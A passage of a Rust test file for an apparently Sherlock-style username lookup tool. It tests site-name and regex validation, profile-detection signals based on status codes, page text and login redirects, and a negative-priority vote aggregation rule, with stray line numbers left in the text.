    // Guard against over-tightening: names we actually ship must keep
    // passing validation.
    let shipped_names = [
        "GitHub",
        "Steam Community (User)",
        "X / Twitter",
        "osu!",
        "Eintracht Frankfurt Forum",
        "Archive of Our Own",
        "Career.habr",
        "fl",
        "GitLab.com",
        "Sbazar.cz",
    ];
    for ok in shipped_names {
        let mut candidate = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        candidate.name = ok.into();
        let outcome = candidate.validate();
        assert!(outcome.is_ok(), "expected {ok:?} to validate");
    }
}
888
#[test]
fn validate_rejects_overlong_name() {
    // A 100-character name must fail validation with a "longer than"
    // diagnostic.
    let signals = vec![Signal::StatusFound { codes: vec![200] }];
    let mut oversized = site_with(signals);
    oversized.name = "A".repeat(100);
    let message = oversized.validate().unwrap_err().to_string();
    assert!(message.contains("longer than"));
}
896
#[test]
fn validate_accepts_well_formed_regex_check() {
    // A plain character-class regex in `regex_check` must not block
    // validation.
    let signals = vec![Signal::StatusFound { codes: vec![200] }];
    let mut gated = site_with(signals);
    gated.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
    let outcome = gated.validate();
    assert!(outcome.is_ok());
}
903
#[test]
fn validate_tolerates_unsupported_regex_features() {
    // Regexes imported from Sherlock sometimes contain lookarounds such as
    // `(?!...)`, which Rust's `regex` crate cannot compile. Such a site
    // should still load — the username gate is silently disabled instead
    // of the whole site being rejected.
    let signals = vec![Signal::StatusFound { codes: vec![200] }];
    let mut gated = site_with(signals);
    gated.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
    let outcome = gated.validate();
    assert!(
        outcome.is_ok(),
        "lookaround-bearing regex should warn, not reject the site"
    );
}
917
#[test]
fn signal_status_found_votes_only_on_match() {
    // `StatusFound` votes Found when the status is listed and stays
    // silent (Ambiguous) otherwise.
    let rule = Signal::StatusFound { codes: vec![200] };

    let listed_status = Probe {
        status: 200,
        final_url: "https://example.com/alice",
        body: "",
    };
    assert_eq!(rule.evaluate(&listed_status), SignalVerdict::Found);

    let unlisted_status = Probe {
        status: 404,
        final_url: "https://example.com/alice",
        body: "",
    };
    assert_eq!(rule.evaluate(&unlisted_status), SignalVerdict::Ambiguous);
}
933
#[test]
fn signal_status_not_found_votes_only_on_match() {
    // `StatusNotFound` votes NotFound when the status is listed and stays
    // silent (Ambiguous) otherwise.
    let rule = Signal::StatusNotFound { codes: vec![404] };

    let listed_status = Probe {
        status: 404,
        final_url: "",
        body: "",
    };
    assert_eq!(rule.evaluate(&listed_status), SignalVerdict::NotFound);

    let unlisted_status = Probe {
        status: 200,
        final_url: "",
        body: "",
    };
    assert_eq!(rule.evaluate(&unlisted_status), SignalVerdict::Ambiguous);
}
949
#[test]
fn signal_body_absent_votes_not_found_when_text_present() {
    // `BodyAbsent` votes NotFound when its marker text appears in the
    // body and stays silent (Ambiguous) when it does not.
    let rule = Signal::BodyAbsent {
        text: "Profile not found".into(),
    };

    let with_marker = Probe {
        status: 200,
        final_url: "",
        body: "<h1>Profile not found</h1>",
    };
    assert_eq!(rule.evaluate(&with_marker), SignalVerdict::NotFound);

    let without_marker = Probe {
        status: 200,
        final_url: "",
        body: "<h1>Welcome alice</h1>",
    };
    assert_eq!(rule.evaluate(&without_marker), SignalVerdict::Ambiguous);
}
967
#[test]
fn signal_redirect_absent_inspects_final_url() {
    // `RedirectAbsent` votes NotFound when the final URL contains the
    // fragment and stays silent (Ambiguous) when it does not.
    let rule = Signal::RedirectAbsent {
        fragment: "/login".into(),
    };

    let bounced_to_login = Probe {
        status: 200,
        final_url: "https://example.com/login?next=/alice",
        body: "",
    };
    assert_eq!(rule.evaluate(&bounced_to_login), SignalVerdict::NotFound);

    let stayed_on_profile = Probe {
        status: 200,
        final_url: "https://example.com/alice",
        body: "",
    };
    assert_eq!(rule.evaluate(&stayed_on_profile), SignalVerdict::Ambiguous);
}
985
#[test]
fn aggregate_found_when_only_found_signals_fire() {
    // One Found vote plus a silent signal aggregates to Found.
    let votes = [SignalVerdict::Found, SignalVerdict::Ambiguous];
    assert_eq!(aggregate(votes), MatchKind::Found);
}
991
#[test]
fn aggregate_not_found_when_only_not_found_signals_fire() {
    // One NotFound vote plus a silent signal aggregates to NotFound.
    let votes = [SignalVerdict::NotFound, SignalVerdict::Ambiguous];
    assert_eq!(aggregate(votes), MatchKind::NotFound);
}
997
#[test]
fn aggregate_not_found_wins_over_found() {
    // Negative-priority rule: when both kinds of vote are cast, the
    // NotFound vote decides the outcome.
    let votes = [SignalVerdict::Found, SignalVerdict::NotFound];
    assert_eq!(aggregate(votes), MatchKind::NotFound);
}
1004
#[test]
fn aggregate_uncertain_when_no_signals_fire() {
    // If every signal stays silent the verdict is Uncertain.
    let votes = [SignalVerdict::Ambiguous, SignalVerdict::Ambiguous];
    assert_eq!(aggregate(votes), MatchKind::Uncertain);
}
1010
#[test]
fn aggregate_empty_is_uncertain() {
    // With no votes at all the verdict is Uncertain.
    let no_votes = std::iter::empty::<SignalVerdict>();
    assert_eq!(aggregate(no_votes), MatchKind::Uncertain);
}
1016
#[test]
fn needs_body_is_true_only_for_body_signals() {
    // Status and redirect signals must not report that they need the body.
    let status_found = Signal::StatusFound { codes: vec![200] };
    assert!(!status_found.needs_body());

    let status_not_found = Signal::StatusNotFound { codes: vec![404] };
    assert!(!status_not_found.needs_body());

    let redirect_absent = Signal::RedirectAbsent {
        fragment: "/login".into(),
    };
    assert!(!redirect_absent.needs_body());

    // Both body-text signals must report that they need the body.
    let body_present = Signal::BodyPresent { text: "x".into() };
    assert!(body_present.needs_body());

    let body_absent = Signal::BodyAbsent { text: "x".into() };
    assert!(body_absent.needs_body());
}
1030
#[test]
fn deserializes_signal_list() {
    // A JSON site entry with two tagged signals must deserialize into a
    // `Site` that keeps its name, carries both signals and validates.
    let json = r#"{
        "name": "GitHub",
        "url": "https://github.com/{username}",
        "signals": [
            { "kind": "status_found", "codes": [200] },
            { "kind": "status_not_found", "codes": [404] }
        ]
    }"#;
    let parsed = serde_json::from_str::<Site>(json).unwrap();
    assert_eq!(parsed.name, "GitHub");
    assert_eq!(parsed.signals.len(), 2);
    parsed.validate().unwrap();
}
1046
1047 proptest::proptest! {
1048 /// For any mix of per-signal verdicts, aggregation obeys the
1049 /// negative-priority spec: any NotFound wins; else any Found; else
1050 /// Uncertain.
1051 #[test]
1052 fn aggregate_matches_negative_priority_spec(
1053 votes in proptest::collection::vec(
1054 proptest::prop_oneof![
1055 proptest::strategy::Just(SignalVerdict::Found),
1056 proptest::strategy::Just(SignalVerdict::NotFound),
1057 proptest::strategy::Just(SignalVerdict::Ambiguous),
1058 ],
1059 0..16,
1060 ),
1061 ) {
1062 let kind = aggregate(votes.iter().copied());
1063 let expected = if votes.contains(&SignalVerdict::NotFound) {
1064 MatchKind::NotFound
1065 } else if votes.contains(&SignalVerdict::Found) {
1066 MatchKind::Found
1067 } else {
1068 MatchKind::Uncertain
1069 };
1070 proptest::prop_assert_eq!(kind, expected);
1071 }
1072 }
1073}